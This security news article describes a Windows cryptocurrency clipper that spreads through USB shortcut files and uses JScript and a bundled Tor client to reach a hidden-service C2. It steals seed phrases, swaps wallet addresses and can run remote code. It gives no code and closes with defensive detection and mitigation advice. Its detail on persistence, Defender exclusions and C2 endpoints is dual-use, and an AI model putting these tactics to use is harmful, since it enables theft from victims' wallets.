New Crypto Clipper Uses Windows Script Host and ActiveXObject for Remote Code Execution

A novel Windows-based cryptocurrency clipper that has been active since February 2026 and leverages Windows Script Host (WScript) and ActiveXObject calls to achieve remote code execution and persistent, high-frequency data theft.

The campaign stands out because it avoids traditional installers and exposed IP-based command-and-control (C2) infrastructure; instead, it bundles a portable Tor client.

Routes all C2 traffic through a local SOCKS5 proxy at localhost:9050, and uses JScript-based logic to both steal clipboard contents and accept runtime commands from a hidden-service C2.

In observed infections, initial access is gained via malicious .lnk shortcut files commonly propagated on USB removable media.

When a user opens a shortcut, a staged worm component executes and proliferates by creating additional .lnk files that mimic legitimate documents, hiding originals, and dropping two obfuscated JavaScript payloads into a five-character named folder under C:UsersPublicDocuments.

The worm ensures persistence by creating scheduled tasks one to spread to newly inserted USB devices and another to launch the stealer component on a recurring basis and uses Defender exclusions to avoid detection of its dropped payloads.

The clipper’s runtime is dominated by script-driven operations. The JavaScript payload uses WScript and ActiveXObject to query the environment (including a simple anti-analysis check that exits if Task Manager is present), spawn hidden processes, and launch a renamed Tor binary (ugate.exe).

Microsoft Threat Intelligence and Microsoft Defender Experts identified a Windows-based cryptocurrency clipper that has affected users. 

After waiting roughly 60 seconds for Tor to bootstrap, the malware generates a victim GUID, registers with a .onion C2, and enters a tight loop: polling /route.php for commands, monitoring the clipboard at approximately 500 ms intervals for BIP39 seed phrases and private-key patterns, replacing copied wallet addresses with attacker-controlled alternatives, and uploading screenshots asynchronously to /recvf.php.

Crypto Clipper Uses Windows Script

If the C2 returns an EVAL instruction, the clipper will evaluate attacker-supplied JScript code at runtime functionally converting a financially motivated stealer into a lightweight backdoor.

The .lnk payload scans the USB device for common document files like .doc, .xlsx, .pdf, hides the original files, and creates additional .lnk shortcut files with the same file names.

This architecture complicates traditional network-based detection and takedown efforts. By resolving .onion addresses within the bundled Tor client and directing traffic only to localhost:9050, the actor reduces DNS and IP telemetry visibility.

The malware relies on HTTP-over-Tor POSTs (via curl through the SOCKS5 proxy) for beacons, exfiltration of seeds and private keys, and file uploads.

Bitcoin P2SH address which starts with a “3” and has a length of 32-36 values, the stealer replaces the address with one matching the original address on the first two characters.

The C2 protocol includes heartbeat GUIDs, SEED/PKEY exfiltration actions, REPL notifications for address replacement, and the EVAL command for remote code execution.

Defenders should prioritize behavioral detection: look for script interpreters (wscript.exe, cscript.exe, wsmprovhost) spawning unexpected child processes or launching renamed binaries, processes invoking localhost:9050 or creating a local SOCKS proxy, PowerShell or script-based screen-capture commands, and any signs of clipboard reading or address substitution.

Microsoft Defender for Endpoint flags multiple components of this campaign (for example, Suspicious JavaScript process and Possible data exfiltration using Curl), while Microsoft Defender Antivirus detects the family as Trojan: Win32/CryptoBandits.A.

Mitigation recommendations include disabling AutoRun/AutoPlay for removable media, blocking .lnk execution from removable drives via GPO, restricting or monitoring use of wscript.exe and cscript.exe, and enabling Attack Surface Reduction rules that block obfuscated scripts and suspicious child-process chains.

Hunt for local SOCKS5 activity on localhost:9050 and correlate scripting behavior with network, clipboard, and process telemetry to surface infections before funds are stolen.

Indicators of compromise (IOC)

Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.

Follow us on Google News, LinkedIn, and X to Get Instant Updates and Set GBH as a Preferred Source in Google.